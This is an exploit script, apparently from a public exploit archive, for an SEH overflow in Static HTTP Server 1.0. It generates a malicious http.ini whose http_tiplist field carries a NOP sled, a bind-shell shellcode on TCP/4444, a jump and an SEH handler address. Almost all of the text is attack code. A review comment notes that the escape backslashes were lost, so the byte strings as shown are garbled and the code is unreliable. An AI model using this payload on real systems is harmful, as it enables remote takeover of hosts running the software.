# Title : Static HTTP Server 1.0 - SEH Overflow
# Published : 2013-07-01
# Author :
#!/usr/bin/env python
import os
#
# Title************************Static HTTP Server SEH Overflow - HTTP Config - http_tiplist
# Discovered and Reported******June 2013
# Discovered/Exploited By******Jacob Holcomb/Gimppy, Security Analyst @ Independent Security Evaluators
# Exploit/Advisory*************http://infosec42.blogspot.com/
# Software*********************Static HTTP Server v1.0 (Listens on TCP/80)
# *****************************http://sourceforge.net/projects/static-httpd/?source=dlp
# Tested Platform*************Windows XP SP2
# CVE**************************Static HTTP Server 1.0 - SEH Overflow: Pending
#
# Notes:
# Multiple HTTP commands and headers are vulnerable to overflows and trigger an exception, but
# I was unable to control the SEH handler with anything but configuration options in the http.ini.
#
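def fileCreate():
    """Create ``http.ini`` in the current working directory and return it open for writing.

    The file is opened in text mode (``"w"``); the caller owns the handle and
    must close it.

    Returns:
        The open file object for ``http.ini``.

    Raises:
        IOError / OSError: re-raised after printing a hint when the file cannot
        be created (typically no write access to the current directory). The
        original version fell through to an UnboundLocalError on ``fileOpen``
        and printed the ``os.getcwd`` function object instead of the path.
    """
    cwd = os.getcwd()
    print("n[*] Your current file directory is %s. " % cwd)
    File = "http.ini"
    try:
        # Only the open() can fail; keep the try body to that one call.
        fileOpen = open(File, "w")
    except (IOError, OSError):
        print("n[*] ERROR! There was an issue creating your file. Please make sure you have write access to %s!!!!!n" % cwd)
        raise
    print("[*] Configuration file %s will be written to %s." % (File, cwd))
    return fileOpen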
def main():
    """Assemble the ``sploit`` buffer and write it into a generated ``http.ini``.

    The pieces below are concatenated in the order
    NOP2 + shellcode + NOP1 + jmp + prev + Handler, substituted into the
    ``http_tiplist`` entry of the config template, and written through the
    file handle returned by fileCreate().
    """
    # NOTE(review): on this page the escape backslashes appear to have been
    # lost in extraction, so "x90" is three ASCII characters as written and
    # the string lengths do not match the byte counts in the comments below.
    NOP1 = "x90" * 1691
    NOP2 = NOP1[0:349]
    prev = "xEBxF6x90x90" #Short JMP -10 bytes
    Handler = "x9Ex1Dx40x00"#00401D9E httpd.exe
    jmp = "xe9x87xeexffxff"#FFFFEE87#"xe9xA3xfexffxff"
    #344 Byte Bind Shell TCP/4444
    shellcode = ("xdbxddxbax81x90xd3xb1xd9x74x24xf4x5bx2bxc9" +
    "xb1x50x31x53x18x83xebxfcx03x53x95x72x26x4d" +
    "xffx99x84x46x06xa2xe8x68x98xd6x7bxb3x7cx62" +
    "xc6x87xf7x08xccx8fx06x1ex45x20x10x6bx05x9f" +
    "x21x80xf3x54x15xddx05x85x64x21x9cxf5x02x61" +
    "xebx02xcbxa8x19x0cx09xc7xd6x35xd9x3cx3fx3f" +
    "x04xb7x60x9bxc7x23xf8x68xcbxf8x8ex30xcfxff" +
    "x7bxcdxc3x74xf2xbex3fx97x64xfcx0ex7cx02x89" +
    "x33xb2x40xcdxbfx39x26xd2x12xb6x87xe2x32xa1" +
    "x89xbdxc4xddxc6xbex0ex7bxb4x26xc6xb7x08xcf" +
    "x61xcbx5ex50xd9xd4x4fx06x2axc7x8cxecxfcxe7" +
    "xbbx4cx75xf2x22xf2x68xf5xa8xa1x18x04x52x99" +
    "xb4xd1xa5xefxe9xb5x4axd9xa2x6axe6xb5x17xce" +
    "x5bx79xc4x2fx8bx1bx82xdex70x82x01x68x69xdf" +
    "xcdxcex70x90xcax58x7ax86xbex76xd5x72xc1xa7" +
    "xbdxd8x90x66xd7x76x15xa0x74x2cx16x9dx13x2b" +
    "xa1x98xadxe4xcex73x7dx5fx64x29x81x8fx17xb9" +
    "x9ax49xd1x43x32x55x0bxe6x43x79xd5x63xd8x1c" +
    "x71x17x4dx68x64xbdxddx33x4fx8ex57x24xe5x4a" +
    "xe1x49xc8x92x02x27xd4x51xc8xc6x6ax7ax81xba" +
    "x10xbax0ex6fx4fxd2x22x8ex3cx35x3cx1bx06xc5" +
    "x14xbfxd1x6bxc8x11x8cxe1xebxc0x7fxa3xbax1d" +
    "xafx23x90x3bx4ax7axb9x44x82xe8xc1x44x1dx12" +
    "xedx30x36x10x8dx83xdcx17x44x59xe3x38x01xae" +
    "x91xbdx8dx1dx5ax6bxcex72")
    # Final buffer; the order is the author's and is not changed here.
    sploit = NOP2 + shellcode + NOP1 + jmp + prev + Handler
    # fileCreate() returns an open handle for http.ini in the current directory.
    File = fileCreate()
    # The template lines must stay at column 0: they are the file's contents.
    # As written, the http_tiplist line carries a leading '#' in the template.
    Config = ("""
# HTTP Daemon config file
# GarajCode programed by Savu Andrei
# This is the configuration file
# You can configure the maximum number
# of simultanious connections
max_http_connections = 256
# The port on which the server will listen
http_port = 80
# Multiple connections from same computer
http_mcsc = 1
# Banned ip list - separed by ;
http_ubip = 0
# http_biplist = ""
# Trusted ip list - separed by ;
http_utip = 0
# http_tiplist = "%s"
""") % sploit
    File.write(Config)
    File.close()
# Script entry point: only generate the file when run directly, not on import.
if __name__ == '__main__':
    main()